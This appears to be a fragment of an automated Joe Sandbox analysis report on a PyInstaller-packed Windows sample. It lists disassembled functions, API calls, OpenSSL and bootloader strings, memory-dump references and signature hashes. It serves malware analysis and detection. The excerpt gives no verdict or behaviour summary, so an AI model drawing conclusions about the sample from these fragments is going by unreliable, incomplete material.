                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469130641.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469130641.00007FF7EAD41000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469304096.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff7ead00000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Message$CurrentFormatProcess
                                                                                                                                                                                                                              • String ID: %ls: $<FormatMessageW failed.>$Error$[PYI-%d:ERROR]
                                                                                                                                                                                                                              • API String ID: 3940978338-251083826
                                                                                                                                                                                                                              • Opcode ID: c67c27f58c2af476bbbd059d0433c12e6f67668a4e3ecf6e42cf1bc8669f0b6b
                                                                                                                                                                                                                              • Instruction ID: 9ecc6b87ec965c91b67ea067c1b481f8fca2832ff5f007ae2c7cd0bea07cbbb1
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c67c27f58c2af476bbbd059d0433c12e6f67668a4e3ecf6e42cf1bc8669f0b6b
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2931B332B08A4142F721EB25A8543AAA796FB88B98F810136EF4D9375DDE3CD546C721
                                                                                                                                                                                                                              Function 00007FF8E7A21497 Relevance: 10.8, APIs: 1, Strings: 5, Instructions: 306COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1490107533.00007FF8E7A21000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FF8E7A20000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1489932395.00007FF8E7A20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1490107533.00007FF8E7AA3000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1490107533.00007FF8E7AA5000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1490107533.00007FF8E7ACD000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1490107533.00007FF8E7AD8000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1490107533.00007FF8E7AE3000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1493021775.00007FF8E7AE7000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1493179025.00007FF8E7AE9000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff8e7a20000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: $..\s\ssl\statem\extensions_srvr.c$HMAC$SHA2-256$tls_construct_stoc_cookie
                                                                                                                                                                                                                              • API String ID: 0-1087561517
                                                                                                                                                                                                                              • Opcode ID: b04bc961801d08b794c6a8917a6a781b33b1234d7739c92a3603f12c1ead9c39
                                                                                                                                                                                                                              • Instruction ID: b4b3b26a3a378ca5e687b7c91eddfc8a523b3862929a3fd5ad125d5a70a11587
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b04bc961801d08b794c6a8917a6a781b33b1234d7739c92a3603f12c1ead9c39
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 43D14D61B0CA8380FB64AAE2E5537FE2295AF457C4F844032ED2E57BC6DE3DE5458312
                                                                                                                                                                                                                              Function 00007FF8E7A226E4 Relevance: 10.8, APIs: 2, Strings: 4, Instructions: 256COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1490107533.00007FF8E7A21000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FF8E7A20000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1489932395.00007FF8E7A20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1490107533.00007FF8E7AA3000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1490107533.00007FF8E7AA5000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1490107533.00007FF8E7ACD000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1490107533.00007FF8E7AD8000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1490107533.00007FF8E7AE3000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1493021775.00007FF8E7AE7000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1493179025.00007FF8E7AE9000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff8e7a20000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: ..\s\ssl\ssl_rsa.c$SERVERINFO FOR $SERVERINFOV2 FOR $SSL_CTX_use_serverinfo_file
                                                                                                                                                                                                                              • API String ID: 0-2528746747
                                                                                                                                                                                                                              • Opcode ID: 98d70f9a39462037c8b1c5d7b0f73ea762ea31059b56d3381b4878a8d9f0083a
                                                                                                                                                                                                                              • Instruction ID: 4e6ad4c0c55f6e7683bddea0a9fde3b67936a7ae26bf6149a9d0dedd46f94866
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 98d70f9a39462037c8b1c5d7b0f73ea762ea31059b56d3381b4878a8d9f0083a
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 33B18D61B0865285FB15EBE2E8423BD2761FF847C5F904032EA2D47A96EF3DE6458343
                                                                                                                                                                                                                              Function 00007FF7EAD0DCC8 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • LoadLibraryExW.KERNEL32(?,?,?,00007FF7EAD0DF7A,?,?,?,00007FF7EAD0DC6C,?,?,?,00007FF7EAD0D869), ref: 00007FF7EAD0DD4D
                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,00007FF7EAD0DF7A,?,?,?,00007FF7EAD0DC6C,?,?,?,00007FF7EAD0D869), ref: 00007FF7EAD0DD5B
                                                                                                                                                                                                                              • LoadLibraryExW.KERNEL32(?,?,?,00007FF7EAD0DF7A,?,?,?,00007FF7EAD0DC6C,?,?,?,00007FF7EAD0D869), ref: 00007FF7EAD0DD85
                                                                                                                                                                                                                              • FreeLibrary.KERNEL32(?,?,?,00007FF7EAD0DF7A,?,?,?,00007FF7EAD0DC6C,?,?,?,00007FF7EAD0D869), ref: 00007FF7EAD0DDF3
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(?,?,?,00007FF7EAD0DF7A,?,?,?,00007FF7EAD0DC6C,?,?,?,00007FF7EAD0D869), ref: 00007FF7EAD0DDFF
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1469032874.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1467847222.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469085811.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469130641.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469130641.00007FF7EAD41000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469304096.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff7ead00000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                                                                                                                                                              • String ID: api-ms-
                                                                                                                                                                                                                              • API String ID: 2559590344-2084034818
                                                                                                                                                                                                                              • Opcode ID: 276526191d17588ee9fa22b972cdf0953455baf5c8a53fb276b347519b5968a9
                                                                                                                                                                                                                              • Instruction ID: 2c713b49549d6f197d2fde16d52d0d293cb4c8df6ec7ff3b1af5dffb154b89d4
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 276526191d17588ee9fa22b972cdf0953455baf5c8a53fb276b347519b5968a9
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8B31A121B1A74291FE12EB06A4407B9A395FF48FA8F994577ED5D07388EF7CE4448231
                                                                                                                                                                                                                              Function 00007FF7EAD02A50 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 64COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetCurrentProcessId.KERNEL32(00000000,?,?,?,00000000,00007FF7EAD0351A,?,00000000,00007FF7EAD03F23), ref: 00007FF7EAD02AA0
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1469032874.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1467847222.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469085811.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469130641.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469130641.00007FF7EAD41000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469304096.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff7ead00000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CurrentProcess
                                                                                                                                                                                                                              • String ID: 0$WARNING$Warning$Warning [ANSI Fallback]$[PYI-%d:%s]
                                                                                                                                                                                                                              • API String ID: 2050909247-2900015858
                                                                                                                                                                                                                              • Opcode ID: d3ff72078d09a899d0ca032b5bdbc8691629937d026b54217f09319e947088a3
                                                                                                                                                                                                                              • Instruction ID: f5e54560c04cc6bca7bda04a6944ccef72f7451e5b81d96eeb26d12b1cbd133b
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d3ff72078d09a899d0ca032b5bdbc8691629937d026b54217f09319e947088a3
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 29217F72A19B8142F720EB61B8817E6A7A4FB88784F800176FE8D4365DDF7CD245C651
                                                                                                                                                                                                                              Function 00007FF7EAD08570 Relevance: 10.6, APIs: 7, Instructions: 63COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1469032874.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1467847222.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469085811.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469130641.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469130641.00007FF7EAD41000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469304096.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff7ead00000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Token$InformationProcess$CloseConvertCurrentErrorHandleLastOpenString
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 995526605-0
                                                                                                                                                                                                                              • Opcode ID: fa90e23b90d603ff8a1fc3170628a297920662056bab6e12f28c88f429b12389
                                                                                                                                                                                                                              • Instruction ID: 7a205ca501030bbe37e45ae4147238bd0d51d1dbba501999e9b6e4a0af08ac41
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: fa90e23b90d603ff8a1fc3170628a297920662056bab6e12f28c88f429b12389
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: ED216F31A0C64242FB10EB55B58432EE3A5EB817A4FD00276EAAC43BECDEBCD4558721
                                                                                                                                                                                                                              Function 00007FF7EAD1B150 Relevance: 10.6, APIs: 7, Instructions: 62COMMONLIBRARYCODE
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1469032874.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1467847222.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469085811.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469130641.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469130641.00007FF7EAD41000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469304096.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff7ead00000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Value$ErrorLast
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2506987500-0
                                                                                                                                                                                                                              • Opcode ID: bd40692f84e3da01acd5c9e715af8932c2ff4b5b564443a413d720313231dc09
                                                                                                                                                                                                                              • Instruction ID: 8a3ba129aaf0e41bd238301cd0bc4d9668ea0521642bac162b1e70f298d2df74
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: bd40692f84e3da01acd5c9e715af8932c2ff4b5b564443a413d720313231dc09
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: BD215C30E0964281F655F3319652379D396DF687B0F8146B7D93E476DEDD3CA8808222
                                                                                                                                                                                                                              Function 00007FF8E8137FC8 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 50networkCOMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1496149556.00007FF8E8131000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FF8E8130000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1495728438.00007FF8E8130000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1496149556.00007FF8E8141000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1496149556.00007FF8E8143000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1496149556.00007FF8E8146000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1496995524.00007FF8E8147000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1497677293.00007FF8E8148000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff8e8130000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: getservbyporthtons
                                                                                                                                                                                                                              • String ID: getservbyport: port must be 0-65535.$i|s:getservbyport$port/proto not found$socket.getservbyport
                                                                                                                                                                                                                              • API String ID: 3477891686-2618607128
                                                                                                                                                                                                                              • Opcode ID: 4471399b94432fca938d6bd7da45e6e9e5440958a35927fdab7468f72b463937
                                                                                                                                                                                                                              • Instruction ID: 36e880a631399776a2b2199e98d4a8e9082cc79d6a3b1e5f770aa2a7a57a7e92
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4471399b94432fca938d6bd7da45e6e9e5440958a35927fdab7468f72b463937
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 51210931A18A0382EB109BA1E88477D7371FB86BC5F560031DA8E57668DF3DE499C70A
                                                                                                                                                                                                                              Function 00007FF7EAD27D6C Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1469032874.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1467847222.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469085811.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469130641.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469130641.00007FF7EAD41000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469304096.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff7ead00000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                                                                                                                                                                              • String ID: CONOUT$
                                                                                                                                                                                                                              • API String ID: 3230265001-3130406586
                                                                                                                                                                                                                              • Opcode ID: 3755c2f75cb97972cd4ab37a7e27d28fd0bf6f95a56d27d10542fc75f089f0eb
                                                                                                                                                                                                                              • Instruction ID: 7bd9408958f38dd35ee73b0b19f1becb0e3da1c08a021a71317dd89eae2cf5ae
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3755c2f75cb97972cd4ab37a7e27d28fd0bf6f95a56d27d10542fc75f089f0eb
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7311B131A18B4282F760EB12E844329A3A4FB88BF4F840275EA5D87798CF7CD814C721
                                                                                                                                                                                                                              Function 00007FF8E7A22310 Relevance: 9.1, APIs: 1, Strings: 4, Instructions: 391COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1490107533.00007FF8E7A21000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FF8E7A20000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1489932395.00007FF8E7A20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1490107533.00007FF8E7AA3000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1490107533.00007FF8E7AA5000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1490107533.00007FF8E7ACD000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1490107533.00007FF8E7AD8000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1490107533.00007FF8E7AE3000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1493021775.00007FF8E7AE7000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1493179025.00007FF8E7AE9000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff8e7a20000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: 00007F9060208
                                                                                                                                                                                                                              • String ID: ..\s\ssl\statem\statem_clnt.c$SHA2-256$resumption$tls_process_new_session_ticket
                                                                                                                                                                                                                              • API String ID: 3464486852-1635961163
                                                                                                                                                                                                                              • Opcode ID: f98c1f9ab64da6bd1c0876dbebf8bdfa299ed10f1d79f079bfe0f178839aff30
                                                                                                                                                                                                                              • Instruction ID: 68d787a6a59951a8f4de5357ea641e6fb8a5262cd7456c8115e0b959be6e0049
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f98c1f9ab64da6bd1c0876dbebf8bdfa299ed10f1d79f079bfe0f178839aff30
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B7029B32B08B8281F7508B96E4867BD77A0EB84BC4F548136EAAD47795DF3CE591C702
                                                                                                                                                                                                                              Function 00007FF7EAD08ED0 Relevance: 9.1, APIs: 6, Instructions: 121COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(?,FFFFFFFF,00000000,00007FF7EAD03FB1), ref: 00007FF7EAD08EFD
                                                                                                                                                                                                                              • K32EnumProcessModules.KERNEL32(?,FFFFFFFF,00000000,00007FF7EAD03FB1), ref: 00007FF7EAD08F5A
                                                                                                                                                                                                                                • Part of subcall function 00007FF7EAD09390: MultiByteToWideChar.KERNEL32(?,?,?,00007FF7EAD045F4,00000000,00007FF7EAD01985), ref: 00007FF7EAD093C9
                                                                                                                                                                                                                              • K32GetModuleFileNameExW.KERNEL32(?,FFFFFFFF,00000000,00007FF7EAD03FB1), ref: 00007FF7EAD08FE5
                                                                                                                                                                                                                              • K32GetModuleFileNameExW.KERNEL32(?,FFFFFFFF,00000000,00007FF7EAD03FB1), ref: 00007FF7EAD09044
                                                                                                                                                                                                                              • FreeLibrary.KERNEL32(?,FFFFFFFF,00000000,00007FF7EAD03FB1), ref: 00007FF7EAD09055
                                                                                                                                                                                                                              • FreeLibrary.KERNEL32(?,FFFFFFFF,00000000,00007FF7EAD03FB1), ref: 00007FF7EAD0906A
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1469032874.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1467847222.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469085811.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469130641.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469130641.00007FF7EAD41000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469304096.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff7ead00000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: FileFreeLibraryModuleNameProcess$ByteCharCurrentEnumModulesMultiWide
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3462794448-0
                                                                                                                                                                                                                              • Opcode ID: 51e73ccb600dcf9d750c353d1e93921ada3daf916e275faff0d4d54491eeaa6f
                                                                                                                                                                                                                              • Instruction ID: 13a75050ef9c01607e677343f9a0904565bb5ea5655d81eefebb84b5324e9fba
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 51e73ccb600dcf9d750c353d1e93921ada3daf916e275faff0d4d54491eeaa6f
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8241B761A1968281FA30EB61E5803BAB395FB84BC8F840176DF4D5779DDE3CE500C721
                                                                                                                                                                                                                              Function 00007FF7EAD090E0 Relevance: 9.1, APIs: 2, Strings: 4, Instructions: 64COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 00007FF7EAD08570: GetCurrentProcess.KERNEL32 ref: 00007FF7EAD08590
                                                                                                                                                                                                                                • Part of subcall function 00007FF7EAD08570: OpenProcessToken.ADVAPI32 ref: 00007FF7EAD085A3
                                                                                                                                                                                                                                • Part of subcall function 00007FF7EAD08570: GetTokenInformation.ADVAPI32 ref: 00007FF7EAD085C8
                                                                                                                                                                                                                                • Part of subcall function 00007FF7EAD08570: GetLastError.KERNEL32 ref: 00007FF7EAD085D2
                                                                                                                                                                                                                                • Part of subcall function 00007FF7EAD08570: GetTokenInformation.ADVAPI32 ref: 00007FF7EAD08612
                                                                                                                                                                                                                                • Part of subcall function 00007FF7EAD08570: ConvertSidToStringSidW.ADVAPI32 ref: 00007FF7EAD0862E
                                                                                                                                                                                                                                • Part of subcall function 00007FF7EAD08570: CloseHandle.KERNEL32 ref: 00007FF7EAD08646
                                                                                                                                                                                                                              • LocalFree.KERNEL32(?,00007FF7EAD03C55), ref: 00007FF7EAD0916C
                                                                                                                                                                                                                              • LocalFree.KERNEL32(?,00007FF7EAD03C55), ref: 00007FF7EAD09175
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1469032874.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1467847222.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469085811.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469130641.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469130641.00007FF7EAD41000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469304096.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff7ead00000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Token$FreeInformationLocalProcess$CloseConvertCurrentErrorHandleLastOpenString
                                                                                                                                                                                                                              • String ID: D:(A;;FA;;;%s)$D:(A;;FA;;;%s)(A;;FA;;;%s)$S-1-3-4$Security descriptor string length exceeds PYI_PATH_MAX!
                                                                                                                                                                                                                              • API String ID: 6828938-1529539262
                                                                                                                                                                                                                              • Opcode ID: 0222097b9c90264a1a2c87a2a2fde68e1a94831f5278aced0db9eca26447961c
                                                                                                                                                                                                                              • Instruction ID: 5faf2dcf634453205b20e61b94ecc619cba160dcf0766a63f7d000a4e0d2f3cd
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0222097b9c90264a1a2c87a2a2fde68e1a94831f5278aced0db9eca26447961c
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: FF214F21A0864281F610FB20E8593EAA3A6FF94784FC44077EA4D4379ADF3CD945C762
